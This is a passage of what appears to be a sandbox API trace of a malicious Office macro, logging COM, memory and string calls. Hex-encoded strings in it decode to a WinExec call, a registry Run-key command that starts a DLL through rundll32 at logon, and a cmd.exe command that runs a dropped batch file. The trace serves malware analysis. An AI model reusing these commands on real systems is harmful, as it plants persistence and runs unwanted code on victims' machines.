IUnknown:AddRef (This=0xa02b108) returned 0x4 [0157.569] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc728 | out: ppvObject=0x1dc728*=0x0) returned 0x80004002 [0157.569] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dc708, pDummy=0x10 | out: ppTypeAttr=0x1dc708, pDummy=0x10) returned 0x0 [0157.569] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0157.569] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0157.569] IUnknown:Release (This=0xa02b108) returned 0x4 [0157.569] IUnknown:Release (This=0xa02b108) returned 0x3 [0157.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57310ee, cbMultiByte=5, lpWideCharStr=0x1dc6f0, cchWideChar=6 | out: lpWideCharStr="Left") returned 5 [0157.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57310ee, cbMultiByte=5, lpWideCharStr=0x1dc730, cchWideChar=6 | out: lpWideCharStr="Left") returned 5 [0157.569] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="Left", lHashVal=0x107be5, wFlags=0x3, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57310ee, cbMultiByte=5, lpWideCharStr=0x1dc730, cchWideChar=6 | out: lpWideCharStr="Left") returned 5 [0157.569] ITypeComp:RemoteBind (in: This=0x9ab4b60, szName="Left", lHashVal=0x107be5, wFlags=0x3, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57310ee, cbMultiByte=5, lpWideCharStr=0x1dc730, cchWideChar=6 | out: lpWideCharStr="Left") returned 5 [0157.569] ITypeComp:RemoteBind (in: This=0x9ab64b0, szName="Left", lHashVal=0x107be5, wFlags=0x3, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57310ee, cbMultiByte=5, lpWideCharStr=0x1dc730, cchWideChar=6 | out: lpWideCharStr="Left") returned 5 [0157.569] ITypeComp:RemoteBind (in: This=0x9ab6a50, szName="Left", lHashVal=0x107be5, wFlags=0x3, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.570] IMalloc:Alloc (This=0x7fefecb5380, cb=0xc) returned 0xa2b5e50 [0157.570] _mbscpy_s (in: _Dst=0xa2b5e50, _DstSizeInBytes=0x5, _Src=0x57310ee | out: _Dst=0xa2b5e50) returned 0x0 [0157.570] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Left") returned 0x10e151 [0157.570] strcpy_s (in: _Dst=0x1dc840, _DstSize=0xc, _Src="_B_var_Left" | out: _Dst="_B_var_Left") returned 0x0 [0157.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dc840, cbMultiByte=12, lpWideCharStr=0x1dc690, cchWideChar=12 | out: lpWideCharStr="_B_var_Left") returned 12 [0157.570] IUnknown:AddRef (This=0x9ab5f00) returned 0x7 [0157.570] ITypeLib:RemoteIsName (in: This=0x9ab5f00, szNameBuf="_B_var_Left", lHashVal=0x10e151, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=1, pBstrLibName=0x1dc690) returned 0x0 [0157.570] IUnknown:Release (This=0x9ab5f00) returned 0x6 [0157.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_B_var_Left", cchWideChar=-1, lpMultiByteStr=0x1dc840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_B_var_Left", lpUsedDefaultChar=0x0) returned 12 [0157.570] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Left") returned 0x10e151 [0157.570] IUnknown:AddRef (This=0x9ab5f00) returned 0x7 [0157.570] IUnknown:Release (This=0x9ab5f00) returned 0x6 [0157.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a074e, cbMultiByte=12, lpWideCharStr=0x1dc6f0, cchWideChar=13 | out: lpWideCharStr="_B_var_Left") returned 12 [0157.570] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="_B_var_Left", lHashVal=0x10e151, wFlags=0x3, ppTInfo=0x1dc6a8, pDescKind=0x1dc6bc, ppFuncDesc=0x1dc6c0, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6a8*=0xa121698, pDescKind=0x1dc6bc*=1, ppFuncDesc=0x1dc6c0, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.570] ITypeInfo:RemoteGetTypeAttr (in: This=0xa121698, ppTypeAttr=0x1dc6b0, pDummy=0x1 | out: ppTypeAttr=0x1dc6b0, pDummy=0x1) returned 0x0 [0157.570] ITypeInfo:LocalReleaseTypeAttr (This=0xa121698) returned 0x0 [0157.570] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1dc510 | out: ppvObject=0x1dc510*=0xa121698) returned 0x0 [0157.570] ITypeInfo2:GetFuncIndexOfMemId (in: This=0xa121698, memid=1610612748, invkind=1, pFuncIndex=0x1dc550 | out: pFuncIndex=0x1dc550*=0xc) returned 0x0 [0157.570] ITypeInfo2:GetFuncCustData (in: This=0xa121698, index=0xc, GUID=0x7fee51d3758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x1dc568 | out: pVarVal=0x1dc568*(varType=0x0, wReserved1=0x1d, wReserved2=0x0, wReserved3=0x0, varVal1=0xc, varVal2=0x10e151)) returned 0x0 [0157.570] IUnknown:Release (This=0xa121698) returned 0x1 [0157.570] IUnknown:AddRef (This=0xa121698) returned 0x2 [0157.570] ITypeInfo:LocalReleaseFuncDesc (This=0xa121698) returned 0x0 [0157.570] IUnknown:Release (This=0xa121698) returned 0x1 [0157.571] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc768 | out: ppvObject=0x1dc768*=0x0) returned 0x80004002 [0157.571] IUnknown:AddRef (This=0xa121698) returned 0x2 [0157.571] IMalloc:Realloc (This=0x7fefecb5380, pv=0xa2dded0, cb=0x1000) returned 0x9618b10 [0157.571] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc7a0 | out: ppvObject=0x1dc7a0*=0x0) returned 0x80004002 [0157.571] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc770 | out: ppvObject=0x1dc770*=0x0) returned 0x80004002 [0157.571] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc760 | out: ppvObject=0x1dc760*=0x0) returned 0x80004002 [0157.571] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc768 | out: ppvObject=0x1dc768*=0x0) returned 0x80004002 [0157.571] ITypeInfo:RemoteGetTypeAttr (in: This=0xa121698, ppTypeAttr=0x1dc798, pDummy=0x10 | out: ppTypeAttr=0x1dc798, pDummy=0x10) returned 0x0 [0157.571] ITypeInfo:LocalReleaseTypeAttr (This=0xa121698) returned 0x0 [0157.571] IUnknown:AddRef (This=0xa121698) returned 0x3 [0157.571] IUnknown:Release (This=0xa121698) returned 0x2 [0157.571] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc988 | out: ppvObject=0x1dc988*=0x0) returned 0x80004002 [0157.571] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc980 | out: ppvObject=0x1dc980*=0x0) returned 0x80004002 [0157.571] IMalloc:Free (This=0x7fefecb5380, pv=0xa2b5e50) [0157.571] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc1c0, pIndex=0x0 | out: ppTLib=0x1dc1c0*=0x9ab5f00, pIndex=0x0) returned 0x0 [0157.571] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc1d0, pDummy=0x0 | out: ppTLibAttr=0x1dc1d0, pDummy=0x0) returned 0x0 [0157.571] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0157.571] IUnknown:Release (This=0x9ab5f00) returned 0x8 [0157.571] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612748, invkind=1, refPtrFlags=0x1dc1c0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0157.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0157.571] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612748, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc1c0, pbstrName=0x0, pwOrdinal=0x1dc1e0 | out: pBstrDllName=0x1dc1c0*=0x0, pbstrName=0x0, pwOrdinal=0x1dc1e0*=0xc450) returned 0x0 [0157.572] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612748, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc1c0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc1c0, pwOrdinal=0x500000000) returned 0x0 [0157.572] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0157.572] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.572] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.572] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.572] GetCurrentProcess () returned 0xffffffffffffffff [0157.572] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x4b) returned 1 [0157.572] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0157.572] IMalloc:Alloc (This=0x7fefecb5380, cb=0x230) returned 0x9c55f10 [0157.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732f8e, cbMultiByte=11, lpWideCharStr=0x1dc550, cchWideChar=10 | out: lpWideCharStr="WriteLine") returned 0 [0157.572] wcscpy_s (in: _Destination=0x9c55fc8, _SizeInWords=0xa, _Source="WriteLine" | out: _Destination="WriteLine") returned 0x0 [0157.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5730506, cbMultiByte=7, lpWideCharStr=0x1dc550, cchWideChar=6 | out: lpWideCharStr="Close") returned 0 [0157.572] wcscpy_s (in: _Destination=0x9c55fe8, _SizeInWords=0x6, _Source="Close" | out: _Destination="Close") returned 0x0 [0157.572] _mbscpy_s (in: _Dst=0x1dcb50, _DstSizeInBytes=0x5, _Src=0x5732fba | out: _Dst=0x1dcb50) returned 0x0 [0157.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961ee54, cbMultiByte=11, lpWideCharStr=0x6781b84, cchWideChar=24 | out: lpWideCharStr="43 41 4c 4c") returned 11 [0157.572] IUnknown:AddRef (This=0xa02b058) returned 0x2 [0157.572] IUnknown:Release (This=0xa02b058) returned 0x1 [0157.572] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0157.572] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.572] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.573] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.573] GetCurrentProcess () returned 0xffffffffffffffff [0157.573] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x54) returned 1 [0157.573] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0157.573] _mbscpy_s (in: _Dst=0x1dcb50, _DstSizeInBytes=0x4, _Src=0x5731186 | out: _Dst=0x1dcb50) returned 0x0 [0157.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961ee7c, cbMultiByte=23, lpWideCharStr=0x6782410, cchWideChar=48 | out: lpWideCharStr="4b 65 72 6e 65 6c 33 32") returned 23 [0157.573] IUnknown:AddRef (This=0xa02b058) returned 0x2 [0157.573] IUnknown:Release (This=0xa02b058) returned 0x1 [0157.573] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0157.573] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.573] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.573] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.573] GetCurrentProcess () returned 0xffffffffffffffff [0157.573] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x54) returned 1 [0157.573] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0157.573] _mbscpy_s (in: _Dst=0x1dcb50, _DstSizeInBytes=0x3, _Src=0x5732fe2 | out: _Dst=0x1dcb50) returned 0x0 [0157.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961eeac, cbMultiByte=20, lpWideCharStr=0x6782cb4, cchWideChar=42 | out: lpWideCharStr="57 69 6e 45 78 65 63") returned 20 [0157.573] IUnknown:AddRef (This=0xa02b058) returned 0x2 [0157.573] IUnknown:Release (This=0xa02b058) returned 0x1 [0157.573] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0157.574] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.574] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.574] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.574] GetCurrentProcess () returned 0xffffffffffffffff [0157.574] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x54) returned 1 [0157.574] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0157.574] _mbscpy_s (in: _Dst=0x1dcb50, _DstSizeInBytes=0x3, _Src=0x5730e5a | out: _Dst=0x1dcb50) returned 0x0 [0157.574] _mbscpy_s (in: _Dst=0x1dcb50, _DstSizeInBytes=0x4, _Src=0x63a001e | out: _Dst=0x1dcb50) returned 0x0 [0157.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961eee4, cbMultiByte=410, lpWideCharStr=0x6783552, cchWideChar=822 | out: lpWideCharStr="52 45 47 20 41 44 44 20 48 4b 43 55 5c 53 6f 66 74 77 61 72 65 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 52 75 6e 20 2f 76 20 41 75 74 6f 53 74 61 72 74 20 2f 74 20 52 45 47 5f 53 5a 20 2f 64 20 22 72 75 6e 64 6c 6c 33 32 2e 65 78 65 20 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 44 61 74 61 45 78 63 68 61 6e 67 65 2e 64 6c 6c 2c 53 74 61 72 74 22") returned 410 [0157.574] IMalloc:Alloc (This=0x7fefecb5380, cb=0x378) returned 0xa181f90 [0157.574] IUnknown:AddRef (This=0xa02b058) returned 0x2 [0157.574] IUnknown:Release (This=0xa02b058) returned 0x1 [0157.574] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0157.574] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.574] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.574] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.574] GetCurrentProcess () returned 0xffffffffffffffff [0157.574] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x54) returned 1 [0157.574] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0157.574] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9ff4110, cb=0x60) returned 0xa12b820 [0157.574] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x6790000 [0157.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961f08e, cbMultiByte=62, lpWideCharStr=0x6790124, cchWideChar=126 | out: lpWideCharStr="43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 74 74 2e 62 61 74") returned 62 [0157.576] IUnknown:AddRef (This=0xa02b058) returned 0x2 [0157.576] IUnknown:Release (This=0xa02b058) returned 0x1 [0157.576] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0157.576] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.576] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.576] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.576] GetCurrentProcess () returned 0xffffffffffffffff [0157.576] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x54) returned 1 [0157.576] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0157.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732f5e, cbMultiByte=16, lpWideCharStr=0x1dc550, cchWideChar=15 | out: lpWideCharStr="CreateTextFile") returned 0 [0157.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732f8e, cbMultiByte=11, lpWideCharStr=0x1dc550, cchWideChar=10 | out: lpWideCharStr="WriteLine") returned 0 [0157.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5730506, cbMultiByte=7, lpWideCharStr=0x1dc550, cchWideChar=6 | out: lpWideCharStr="Close") returned 0 [0157.576] _mbscpy_s (in: _Dst=0x1dcb50, _DstSizeInBytes=0x5, _Src=0x63a0042 | out: _Dst=0x1dcb50) returned 0x0 [0157.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961f10c, cbMultiByte=95, lpWideCharStr=0x6791476, cchWideChar=192 | out: lpWideCharStr="63 6d 64 2e 65 78 65 20 2f 63 20 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 74 74 2e 62 61 74") returned 95 [0157.576] IMalloc:Alloc (This=0x7fefecb5380, cb=0x230) returned 0x9c56160 [0157.576] IUnknown:AddRef (This=0xa02b058) returned 0x2 [0157.576] IUnknown:Release (This=0xa02b058) returned 0x1 [0157.576] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0157.577] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.577] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.577] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.577] GetCurrentProcess () returned 0xffffffffffffffff [0157.577] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x54) returned 1 [0157.577] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0157.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961f17c, cbMultiByte=35, lpWideCharStr=0x6791daa, cchWideChar=72 | out: lpWideCharStr="{{}}(\"[]\", \"{^}\", \"JCCJ\", \"[*]\", 0)") returned 35 [0157.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961f1a4, cbMultiByte=4, lpWideCharStr=0x6791e56, cchWideChar=10 | out: lpWideCharStr="{{}}") returned 4 [0157.577] IUnknown:AddRef (This=0xa02b108) returned 0x4 [0157.577] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc728 | out: ppvObject=0x1dc728*=0x0) returned 0x80004002 [0157.577] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dc708, pDummy=0x10 | out: ppTypeAttr=0x1dc708, pDummy=0x10) returned 0x0 [0157.577] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0157.577] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0157.577] IUnknown:Release (This=0xa02b108) returned 0x4 [0157.577] IUnknown:Release (This=0xa02b108) returned 0x3 [0157.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a00ca, cbMultiByte=8, lpWideCharStr=0x1dc6f0, cchWideChar=9 | out: lpWideCharStr="Replace") returned 8 [0157.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a00ca, cbMultiByte=8, lpWideCharStr=0x1dc730, cchWideChar=9 | out: lpWideCharStr="Replace") returned 8 [0157.577] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="Replace", lHashVal=0x100e66, wFlags=0x3, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0xa121698, pDescKind=0x1dc6fc*=1, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.577] ITypeInfo:RemoteGetTypeAttr (in: This=0xa121698, ppTypeAttr=0x1dc6f0, pDummy=0x1 | out: ppTypeAttr=0x1dc6f0, pDummy=0x1) returned 0x0 [0157.577] ITypeInfo:LocalReleaseTypeAttr (This=0xa121698) returned 0x0 [0157.577] ITypeInfo:GetRefTypeInfo (in: This=0xa121698, hreftype=0x480, ppTInfo=0x1dc428 | out: ppTInfo=0x1dc428*=0xa121488) returned 0x0 [0157.578] IUnknown:QueryInterface (in: This=0xa121488, riid=0x7fee51d0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc5f8 | out: ppvObject=0x1dc5f8*=0x0) returned 0x80004002 [0157.578] ITypeInfo:RemoteGetTypeAttr (in: This=0xa121488, ppTypeAttr=0x1dc478, pDummy=0x10 | out: ppTypeAttr=0x1dc478, pDummy=0x10) returned 0x0 [0157.578] ITypeInfo:LocalReleaseTypeAttr (This=0xa121488) returned 0x0 [0157.578] IUnknown:QueryInterface (in: This=0xa121488, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc180 | out: ppvObject=0x1dc180*=0x0) returned 0x80004002 [0157.578] IUnknown:QueryInterface (in: This=0xa121488, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc170 | out: ppvObject=0x1dc170*=0x0) returned 0x80004002 [0157.578] IUnknown:QueryInterface (in: This=0xa121488, riid=0x7fee51d0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc178 | out: ppvObject=0x1dc178*=0x0) returned 0x80004002 [0157.578] ITypeInfo:RemoteGetTypeAttr (in: This=0xa121488, ppTypeAttr=0x1dc1a8, pDummy=0x10 | out: ppTypeAttr=0x1dc1a8, pDummy=0x10) returned 0x0 [0157.578] ITypeInfo:LocalReleaseTypeAttr (This=0xa121488) returned 0x0 [0157.578] IUnknown:AddRef (This=0xa121488) returned 0x2 [0157.578] IUnknown:QueryInterface (in: This=0xa121488, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc320 | out: ppvObject=0x1dc320*=0x0) returned 0x80004002 [0157.578] IUnknown:QueryInterface (in: This=0xa121488, riid=0x7fee51d0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc318 | out: ppvObject=0x1dc318*=0x0) returned 0x80004002 [0157.578] IUnknown:Release (This=0xa121488) returned 0x1 [0157.578] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1dc490 | out: ppvObject=0x1dc490*=0xa121698) returned 0x0 [0157.578] ITypeInfo2:GetFuncIndexOfMemId (in: This=0xa121698, memid=1610612785, invkind=1, pFuncIndex=0x1dc488 | out: pFuncIndex=0x1dc488*=0x31) returned 0x0 [0157.578] ITypeInfo2:GetParamCustData (in: This=0xa121698, indexFunc=0x31, indexParam=0x3, 